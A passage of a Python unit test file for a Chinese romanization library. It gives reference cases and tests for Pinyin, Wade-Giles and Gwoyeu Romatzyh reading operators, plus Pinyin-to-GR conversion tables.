([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], u"e'r"),
([u"ti", u"anr"], exception.CompositionError),
([u"chang", u"an"], exception.CompositionError),
([u"ĉaŋ", u"an"], u"ĉaŋ'an"),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"Ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"zhī", True),
(u"tang", True),
(u"ẑī", False),
(u"taŋ", False),
(u"ề", True),
]),
({'toneMarkType': 'numbers'}, [
(u"tiān", False),
(u"ān", False),
(u"mén", False),
(u"lào", False),
(u"xǐ", False),
(u"lü", True),
(u"ê", True),
(u"tian1", True),
(u"an1", True),
(u"men2", True),
(u"lao4", True),
(u"xi3", True),
(u"xian", True),
(u"ti\u0304an", False),
(u"tia\u0304n", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", False),
(u"XIAN", True),
(u"TIAN1", True),
(u"r1", False),
(u"ề", False),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
(u"tiān", False),
(u"ān", False),
(u"mén", False),
(u"lào", False),
(u"xǐ", False),
(u"lü", False),
(u"ê", False),
(u"tian1", True),
(u"an1", True),
(u"men2", True),
(u"lao4", True),
(u"xi3", True),
(u"xian", False),
(u"ti\u0304an", False),
(u"tia\u0304n", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", False),
(u"r", False),
(u"TIĀN", False),
(u"XIAN", False),
(u"TIAN1", True),
(u"r1", False),
(u"ề", False),
]),
({'erhua': 'oneSyllable'}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", True),
(u"er", True),
(u"r", False),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"ề", True),
]),
({'strictDiacriticPlacement': True}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"tia\u0304n", True),
(u"ti\u0304an", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"ề", True),
]),
({'case': 'lower'}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", False),
(u"XIAN", False),
(u"TIAN1", False),
(u"r1", False),
(u"ề", True),
]),
({'toneMarkType': 'numbers', 'yVowel': 'v'}, [
(u"tiān", False),
(u"ān", False),
(u"mén", False),
(u"lào", False),
(u"xǐ", False),
(u"lü", False),
(u"lv", True),
(u"ê", True),
(u"tian1", True),
(u"an1", True),
(u"men2", True),
(u"lao4", True),
(u"xi3", True),
(u"xian", True),
(u"ti\u0304an", False),
(u"tia\u0304n", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", False),
(u"XIAN", True),
(u"TIAN1", True),
(u"r1", False),
(u"ề", False),
]),
({'shortenedLetters': True}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"Ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"zhī", False),
(u"tang", False),
(u"ẑī", True),
(u"taŋ", True),
(u"ŜAŊ", True),
(u"ề", True),
]),
({'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0302', u'\u0300')}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", False),
(u"lü", True),
(u"ê", True),
(u"Ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", False),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"zhī", True),
(u"tang", True),
(u"ẑī", False),
(u"taŋ", False),
(u"ề", False),
]),
]
STRICT_DECOMPOSITION_REFERENCES = [
({}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], False),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], True),
([u"tian", u"an", u"men"], False),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], True),
([u"lao3", u"ang2", u"r5"], True),
([u"TIĀN", u"ĀN", u"MÉN"], False),
([u"TIAN1", u"AN1", u"MEN2"], True),
]),
({'toneMarkType': 'numbers'}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], True),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], False),
([u"tian", u"an", u"men"], False),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], True),
([u"lao3", u"ang2", u"r5"], False),
([u"TIĀN", u"ĀN", u"MÉN"], True),
([u"TIAN1", u"AN1", u"MEN2"], False),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], True),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], False),
([u"tian", u"an", u"men"], True),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], True),
([u"lao3", u"ang2", u"r5"], False),
([u"TIĀN", u"ĀN", u"MÉN"], True),
([u"TIAN1", u"AN1", u"MEN2"], False),
]),
({'toneMarkType': 'numbers', 'erhua': 'oneSyllable'}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], True),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], False),
([u"tian", u"an", u"men"], False),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], False),
([u"lao3", u"ang2", u"r5"], False),
([u"TIĀN", u"ĀN", u"MÉN"], True),
([u"TIAN1", u"AN1", u"MEN2"], False),
]),
]
GUESS_DIALECT_REFERENCES = [
(u"tiān'ānmén", {'toneMarkType': 'diacritics',
'pinyinApostrophe': "'"}),
(u"tiān’ānmén", {'toneMarkType': 'diacritics',
'pinyinApostrophe': u"’"}),
(u"xīān", {'toneMarkType': 'diacritics'}),
(u"tian1'an1men2", {'toneMarkType': 'numbers',
'pinyinApostrophe': "'"}),
(u"nv3hai2", {'toneMarkType': 'numbers', 'yVowel': 'v'}),
(u"NV3HAI2", {'toneMarkType': 'numbers', 'yVowel': 'v'}),
(u"nuu3hai2", {'toneMarkType': 'numbers', 'yVowel': 'uu'}),
(u"nǚhái", {'toneMarkType': 'diacritics', 'yVowel': u'ü'}),
(u"NǙHÁI", {'toneMarkType': 'diacritics', 'yVowel': u'ü'}),
(u"xi1'an1", {'toneMarkType': 'numbers', 'pinyinApostrophe': "'"}),
(u"lao3tou2r5", {'toneMarkType': 'numbers',
'erhua': 'twoSyllables'}),
(u"lao3tour2", {'toneMarkType': 'numbers', 'erhua': 'oneSyllable'}),
(u"peínǐ", {'toneMarkType': 'diacritics'}), # wrong placement of tone
(u"TIĀNĀNMÉN", {'toneMarkType': 'diacritics'}),
(u"e5'r5", {'toneMarkType': 'numbers', 'pinyinApostrophe': "'",
'erhua': 'twoSyllables'}),
(u"yi xia r ", {'toneMarkType': 'numbers', 'erhua': 'twoSyllables'}),
(u"ẑīdao", {'toneMarkType': 'diacritics', 'shortenedLetters': True}),
(u"mian4taŋ1", {'toneMarkType': 'numbers', 'shortenedLetters': True}),
(u"ŜÀŊHǍI", {'toneMarkType': 'diacritics', 'shortenedLetters': True,
'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u030c', u'\u0300')}),
(u"SHÀNGHǍI", {'toneMarkType': 'diacritics',
'shortenedLetters': False}),
(u"Wŏ huì shuō yìdiănr", {'toneMarkType': 'diacritics',
'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0306', u'\u0300')}),
(u"Xiàndài Hànyû Dàcídiân", {'toneMarkType': 'diacritics',
'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0302', u'\u0300')}),
(u"ê Hàn", {'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u030c',
u'\u0300')}),
]
def testStrictDecompositionReferences(self):
"""Test if the given decomposition references pass strictness test."""
for dialect, references in self.STRICT_DECOMPOSITION_REFERENCES:
for reference, target in references:
result = self.f.isStrictDecomposition(reference,
self.READING_NAME, **dialect)
self.assertEquals(result, target,
"Target %s of %s not reached: %s" \
% (repr(target), repr(reference), repr(result)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
class WadeGilesOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'WadeGiles'
DIALECTS = crossDict(
[{}, {'diacriticE': 'e'}],
[{}, {'zeroFinal': 'u'}],
[{}, {'umlautU': 'u'}],
[{}, {'useInitialSz': True}],
[{}, {'neutralToneMark': 'zero'}, {'neutralToneMark': 'five'}],
[{}, {'wadeGilesApostrophe': u"'"}],
[{}, {'toneMarkType': 'numbers'}, {'toneMarkType': 'none'}],
[{}, {'missingToneMark': 'ignore'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
)
def cleanDecomposition(self, decomposition, reading, **options):
if not hasattr(self, '_operators'):
self._operators = []
for operatorReading, operatorOptions, op in self._operators:
if reading == operatorReading and options == operatorOptions:
break
else:
op = self.f.createReadingOperator(reading, **options)
self._operators.append((reading, options, op))
return op.removeHyphens(decomposition)
class WadeGilesOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'WadeGiles'
DECOMPOSITION_REFERENCES = [
({}, [
(u"K’ung³-tzŭ³", [u"K’ung³", u"-", u"tzŭ³"]),
(u"Ssŭma Ch’ien", [u"Ssŭ", "ma", " ", u"Ch’ien"]),
]),
({'wadeGilesApostrophe': "'", 'zeroFinal': 'u'}, [
(u"Ssuma Ch'ien", [u"Ssu", u"ma", " ", u"Ch'ien"]),
]),
({'wadeGilesApostrophe': "'"}, [
(u"Ssuma Ch'ien", [u"Ssuma", " ", u"Ch'ien"]),
(u"Ssŭma Ch'ien", [u"Ssŭ", u"ma", " ", u"Ch'ien"]),
]),
({'wadeGilesApostrophe': "'", 'zeroFinal': 'u'}, [
(u"Ssuma Ch'ien", [u"Ssu", "ma", " ", u"Ch'ien"]),
(u"Ssŭma Ch'ien", [u"Ssŭma", " ", u"Ch'ien"]),
]),
({'toneMarkType': 'numbers', 'umlautU': 'u'}, [
(u"Shih3-Chi4", [u"Shih3", "-", u"Chi4"]),
("chueh1", ["chueh1"])
]),
({'wadeGilesApostrophe': "'", 'strictSegmentation': True}, [
(u"Ssuma Ch'ien", exception.DecompositionError),
(u"Ssŭma Ch'ien", [u"Ssŭ", "ma", " ", u"Ch'ien"]),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u"K’ung³", u"-", u"tzŭ³"], u"K’ung³-tzŭ³"),
([u"K’ung³", u"tzŭ³"], u"K’ung³-tzŭ³"),
]),
({'wadeGilesApostrophe': "'", 'zeroFinal': 'u'}, [
([u"Ssu", "ma", " ", u"Ch'ien"], u"Ssu-ma Ch'ien"),
]),
({'wadeGilesApostrophe': "'"}, [
([u"Ssu", "ma", " ", u"Ch'ien"], exception.CompositionError),
([u"Ssŭ", "ma", " ", u"Ch'ien"], u"Ssŭ-ma Ch'ien"),
]),
({'toneMarkType': 'numbers'}, [
([u"Shih3", "-", u"Chi4"], u"Shih3-Chi4"),
([u"Shih3", u"Chi4"], u"Shih3-Chi4"),
(['t', u'’', 'ung1'], exception.CompositionError),
]),
({'toneMarkType': 'numbers', 'neutralToneMark': 'zero',
'missingToneMark': 'ignore'}, [
([u"Shih3", "-", u"Chi"], u"Shih3-Chi"),
([u"Shih3", u"Chi"], u"Shih3Chi"),
([u"Shih", u"Chi4"], exception.CompositionError),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'diacriticE': 'e'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", False),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", True),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'zeroFinal': 'u'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", False),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", True),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'neutralToneMark': 'zero'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", True),
(u"shih⁵", False),
(u"shih1", False),
]),
({'neutralToneMark': 'five'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", True),
(u"shih1", False),
]),
({'useInitialSz': True}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", False),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"szŭ", True),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'umlautU': 'u'}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", False),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
({'toneMarkType': 'numbers'}, [
(u"shih", True),
(u"jou⁴", False),
(u"nü³", False),
(u"Ssŭ", True),
(u"ch’êng", True),
(u"Ch’ien", True),
(u"ch'ien", False),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", True),
]),
({'wadeGilesApostrophe': "'"}, [
(u"shih", True),
(u"jou⁴", True),
(u"nü³", True),
(u"Ssŭ", True),
(u"ch’êng", False),
(u"Ch’ien", False),
(u"ch'ien", True),
(u"ssu", False),
(u"szu", False),
(u"ch’eng", False),
(u"shih⁰", False),
(u"shih⁵", False),
(u"shih1", False),
]),
]
GUESS_DIALECT_REFERENCES = [
(u"K’ung³-tzǔ³", {'toneMarkType': 'superscriptNumbers',
'wadeGilesApostrophe': u'’', 'zeroFinal': u'ǔ'}),
(u"K’ung³-tzŭ³", {'toneMarkType': 'superscriptNumbers',
'wadeGilesApostrophe': u'’', 'zeroFinal': u'ŭ'}),
(u"Ssŭma Ch'ien", {'wadeGilesApostrophe': "'", 'zeroFinal': u'ŭ'}),
(u"Szuma Ch'ien", {'wadeGilesApostrophe': "'", 'zeroFinal': 'u',
'useInitialSz': True}),
(u"Szu1ma3 Ch'ien1", {'wadeGilesApostrophe': "'", 'zeroFinal': 'u',
'useInitialSz': True, 'toneMarkType': 'numbers'}),
(u"Shih3-Chi4", {'toneMarkType': 'numbers'}),
(u"chih¹-tao⁵", {'neutralToneMark': 'five'}),
(u"chih¹-tao", {'neutralToneMark': 'none'}),
(u"p’êng3yu0", {'neutralToneMark': 'zero', 'diacriticE': u'ê',
'wadeGilesApostrophe': u'’', 'toneMarkType': 'numbers'}),
(u"p’eng³yu", {'neutralToneMark': 'none', 'diacriticE': u'e',
'wadeGilesApostrophe': u'’', 'toneMarkType': 'superscriptNumbers'}),
(u"hsu¹", {'umlautU': 'u', 'toneMarkType': 'superscriptNumbers'}),
(u"nueh1", {'umlautU': 'u', 'toneMarkType': 'numbers'}),
(u"yu³", {'umlautU': u'ü', 'toneMarkType': 'superscriptNumbers'}),
(u"Cheng Ho", {'diacriticE': 'e', 'neutralToneMark': 'zero'}),
# either zero or five to enable tone "None" for all syllables
]
class GROperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'GR'
DIALECTS = crossDict(
[{}, {'strictSegmentation': True}],
[{}, {'abbreviations': False}],
[{}, {'grRhotacisedFinalApostrophe': "'"}],
[{}, {'grSyllableSeparatorApostrophe': "'"}],
[{}, {'optionalNeutralToneMarker': u'₀'}],
[{}, {'case': 'lower'}],
)
@staticmethod
def testUpperCase(dialect):
return dialect.get('case', None) != 'lower'
def cleanDecomposition(self, decomposition, reading, **options):
if not hasattr(self, '_operators'):
self._operators = []
for operatorReading, operatorOptions, op in self._operators:
if reading == operatorReading and options == operatorOptions:
break
else:
op = self.f.createReadingOperator(reading, **options)
self._operators.append((reading, options, op))
return op.removeApostrophes(decomposition)
def testValidAbbreviatedEntitiesAccepted(self):
"""
Test if all abbreviated reading entities returned by
``getAbbreviatedEntities()`` are accepted by ``isAbbreviatedEntity()``.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
entities = grOperator.getAbbreviatedEntities()
for entity in entities:
self.assert_(
grOperator.isAbbreviatedEntity(entity),
"Abbreviated entity %s not accepted" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testAbbreviatedEntitiesConsistency(self):
"""
        Test if abbreviated reading entities returned by
        ``getAbbreviatedEntities()`` are consistent: no abbreviated entity is a
        full form, and all abbreviated forms consist of valid entities.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
fullEntities = grOperator.getFullReadingEntities()
abbrevEntities = grOperator.getAbbreviatedEntities()
# test abbreviated entity is not a full form
for entity in abbrevEntities:
self.assert_(entity not in fullEntities,
"Abbreviated entity %s is a full form" % repr(entity) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# test forms have valid entities
for form in grOperator.getAbbreviatedForms():
for entity in form:
self.assert_(entity in abbrevEntities \
or entity in fullEntities,
"Form %s has invalid entity %s" \
% (repr(form), repr(entity)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
@attr('quiteslow')
def testRhotacisedEntitesBackConversion(self):
"""
        Test if the complementary methods ``getBaseEntitiesForRhotacised()`` and
``getRhotacisedTonalEntity()`` are consistent.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
plainEntities = grOperator.getPlainReadingEntities()
rhotacisedDict = {}
for plainEntity in plainEntities:
for tone in grOperator.getTones():
try:
rhotacisedForm = grOperator.getRhotacisedTonalEntity(
plainEntity, tone)
if rhotacisedForm not in rhotacisedDict:
rhotacisedDict[rhotacisedForm] = set()
rhotacisedDict[rhotacisedForm].add(
(plainEntity, tone))
except exception.UnsupportedError:
pass
# now check that back conversion gives us all the possible entities
for rhotacisedForm in rhotacisedDict:
entityPairs = grOperator.getBaseEntitiesForRhotacised(
rhotacisedForm)
self.assertEquals(entityPairs, rhotacisedDict[rhotacisedForm])
#TODO
class GROperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'GR'
DECOMPOSITION_REFERENCES = [
({}, [
(u"tian’anmen", ["tian", u"’", "an", "men"]),
(u"Beeijing", ["Beei", "jing"]),
(u"faan-guohlai", ["faan", "-", "guoh", "lai"]),
(u'"Haeshianq gen Muh.jianq"', ['"', "Hae", "shianq", " ", "gen",
" ", "Muh", ".jianq", '"']),
(u"keesh", ["kee", "sh"]),
(u"yeou ideal", ["yeou", " ", "i", "deal"]),
(u"TIAN’ANMEN", ["TIAN", u"’", "AN", "MEN"]),
(u"sherm.me", ["sherm", ".me"]),
(u"ig", ["i", "g"]),
]),
({'abbreviations': False}, [
(u"tian’anmen", ["tian", u"’", "an", "men"]),
(u"Beeijing", ["Beei", "jing"]),
(u"faan-guohlai", ["faan", "-", "guoh", "lai"]),
(u'"Haeshianq gen Muh.jianq"', ['"', "Hae", "shianq", " ", "gen",
" ", "Muh", ".jianq", '"']),
(u"keesh", ["keesh"]),
(u"yeou ideal", ["yeou", " ", "i", "deal"]),
(u"TIAN’ANMEN", ["TIAN", u"’", "AN", "MEN"]),
(u"sherm.me", ["sherm", ".me"]),
(u"ig", ["ig"]),
]),
]
COMPOSITION_REFERENCES = [
({}, [
(["tian", "an", "men"], u"tian’anmen"),
(["tian", u"’", "an", "men"], u"tian’anmen"),
(["Beei", "jing"], u"Beeijing"),
(["yeou", " ", "i", "deal"], u"yeou ideal"),
(["faan", "-", "guoh", "lai"], u"faan-guohlai"),
(["TIAN", "AN", "MEN"], u"TIAN’ANMEN"),
(["yeou", " ", "i", "dea'l"], exception.CompositionError),
(["jie", u"’", "l"], exception.CompositionError),
(["sherm", ".me"], u"sherm.me"),
(["san", "g"], u"san’g"),
(["i", "g"], u"ig"),
]),
({'abbreviations': False}, [
(["tian", "an", "men"], u"tian’anmen"),
(["tian", u"’", "an", "men"], u"tian’anmen"),
(["Beei", "jing"], u"Beeijing"),
(["yeou", " ", "i", "deal"], u"yeou ideal"),
(["faan", "-", "guoh", "lai"], u"faan-guohlai"),
(["TIAN", "AN", "MEN"], u"TIAN’ANMEN"),
(["yeou", " ", "i", "dea'l"], exception.CompositionError),
(["jie", u"’", "l"], exception.CompositionError),
(["sherm", ".me"], exception.CompositionError),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u"shau", True),
(u"shao", True),
(u"shaw", True),
(u"dea’l", False),
(u"jie’l", True),
(u"jie'l", False),
(u"˳shyh", True),
(u"sh", True),
(u"j", True),
(u"jemm", True),
(u"JEMM", True),
(u"tzeem.me", False),
(u".v", True),
]),
({'abbreviations': False}, [
(u"shau", True),
(u"shao", True),
(u"shaw", True),
(u"dea’l", False),
(u"jie’l", True),
(u"jie'l", False),
(u"˳shyh", True),
(u"sh", False),
(u"j", False),
(u"jemm", False),
(u"JEMM", False),
(u"tzeem.me", False),
(u".v", False),
]),
]
GUESS_DIALECT_REFERENCES = []
ABBREVIATED_READING_ENTITY_REFERENCES = [
({}, [
(u"sh", True),
(u"SH", True),
(u"x", True),
]),
]
def testAbbreviatedEntitiesReferences(self):
"""
Test if abbreviated reading entity references are accepted by
``isAbbreviatedEntity()``.
"""
for dialect, references in self.ABBREVIATED_READING_ENTITY_REFERENCES:
grOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
for reference, target in references:
result = grOperator.isAbbreviatedEntity(reference)
self.assertEquals(result, target,
"Target %s of %s not reached: %s" \
% (repr(target), repr(reference), repr(result)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
# The following mappings are taken from the Pinyin-to-GR Conversion Tables
# written/compiled by Richard Warmington from 12 December 1998,
# http://home.iprimus.com.au/richwarm/gr/pygrconv.txt
    # Entry for 'ri' has been corrected for tones 1 and 2, 'yo' has been
    # removed as no source was given, and rhotacised finals have been added.
SPECIAL_MAPPING = """
zhi jy jyr jyy jyh
chi chy chyr chyy chyh
shi shy shyr shyy shyh
ri rhy ry ryy ryh
zi tzy tzyr tzyy tzyh
ci tsy tsyr tsyy tsyh
si sy syr syy syh
ju jiu jyu jeu jiuh
qu chiu chyu cheu chiuh
xu shiu shyu sheu shiuh
yi i yi yii yih
ya ia ya yea yah
ye ie ye yee yeh
yai iai yai - -
yao iau yau yeau yaw
you iou you yeou yow
yan ian yan yean yann
yin in yn yiin yinn
yang iang yang yeang yanq
ying ing yng yiing yinq
yong iong yong yeong yonq
wu u wu wuu wuh
wa ua wa woa wah
wo uo wo woo woh
wai uai wai woai way
wei uei wei woei wey
wan uan wan woan wann
wen uen wen woen wenn
wang uang wang woang wanq
weng ueng - woeng wenq
yu iu yu yeu yuh
yue iue yue yeue yueh
yuan iuan yuan yeuan yuann
yun iun yun yeun yunn
er el erl eel ell
yir iel yel yeel yell
yar ial yal yeal yall
yer ie'l ye'l yeel yell
yair - yal - -
yaor iaul yaul yeaul yawl
your ioul youl yeoul yowl
yanr ial yal yeal yall
yinr iel yel yeel yell
yangr iangl yangl yeangl yanql
yingr iengl yengl yeengl yenql
yongr iongl yongl yeongl yonql
wur ul wul wuul wull
war ual wal woal wall
wor uol wol wool woll
wair ual wal woal wall
weir uel wel woel well
wanr ual wal woal wall
wenr uel wel woel well
wangr uangl wangl woangl wanql
wengr uengl - woengl wenql
yur iuel yuel yeuel yuell
yuer iue'l yue'l - yuell
yuanr iual yual yeual yuall
yunr iuel yuel yeuel yuell
"""
# final mapping without line 'r'
FINAL_MAPPING = """
a a ar aa ah ha a
o o or oo oh ho o
e e er ee eh he e
ai ai air ae ay hai ai
ei ei eir eei ey hei ei
ao au aur ao aw hau au
ou ou our oou ow hou ou
an an arn aan ann han an
en en ern een enn hen en
ang ang arng aang anq hang ang
eng eng erng eeng enq heng eng
ong ong orng oong onq hong ong
i i yi ii ih hi i
ia ia ya ea iah hia ia
ie ie ye iee ieh hie ie
iai iai yai - - hiai iai
iao iau yau eau iaw hiau iau
iu iou you eou iow hiou iou
ian ian yan ean iann hian ian
in in yn iin inn hin in
iang iang yang eang ianq hiang iang
ing ing yng iing inq hing ing
iong iong yong eong ionq hiong iong
u u wu uu uh hu u
ua ua wa oa uah hua ua
uo uo wo uoo uoh huo uo
uai uai wai oai uay huai uai
ui uei wei oei uey huei uei
uan uan wan oan uann huan uan
un uen wen oen uenn huen uen
uang uang wang oang uanq huang uang
u: iu yu eu iuh hiu iu
u:e iue yue eue iueh hiue iue
u:an iuan yuan euan iuann hiuan iuan
u:n iun yun eun iunn hiun iun
ar al arl aal all hal al
or ol orl ool oll hol ol
er e'l er'l ee'l ehl he'l e'l
air al arl aal all hal al
eir el erl eel ell hel el
aor aul aurl aol awl haul aul
our oul ourl ooul owl houl oul
anr al arl aal all hal al
enr el erl eel ell hel el
angr angl arngl aangl anql hangl angl
engr engl erngl eengl enql hengl engl
ongr ongl orngl oongl onql hongl ongl
ir iel yel ieel iell hiel iel
iar ial yal eal iall hial ial
ier ie'l ye'l ieel iell hie'l ie'l
iair - yal - - - -
iaor iaul yaul eaul iawl hiaul iaul
iur ioul youl eoul iowl hioul ioul
ianr ial yal eal iall hial ial
inr iel yel ieel iell hiel iel
iangr iangl yangl eangl ianql hiangl iangl
ingr iengl yengl ieengl ienql hiengl iengl
iongr iongl yongl eongl ionql hiongl iongl
ur ul wul uul ull hul ul
uar ual wal oal uall hual ual
uor uol wol uool uoll huol uol
uair ual wal oal uall hual ual
uir uel wel oel uell huel uel
uanr ual wal oal uall hual ual
unr uel wel oel uell huel uel
uangr uangl wangl oangl uanql huangl uangl
uengr uengl - - - huengl uengl
u:r iuel yuel euel iuell hiuel iuel
u:er iue'l yue'l euel iuell hiue'l iue'l
u:anr iual yual eual iuall hiual iual
u:nr iuel yuel euel iuell hiuel iuel
"""
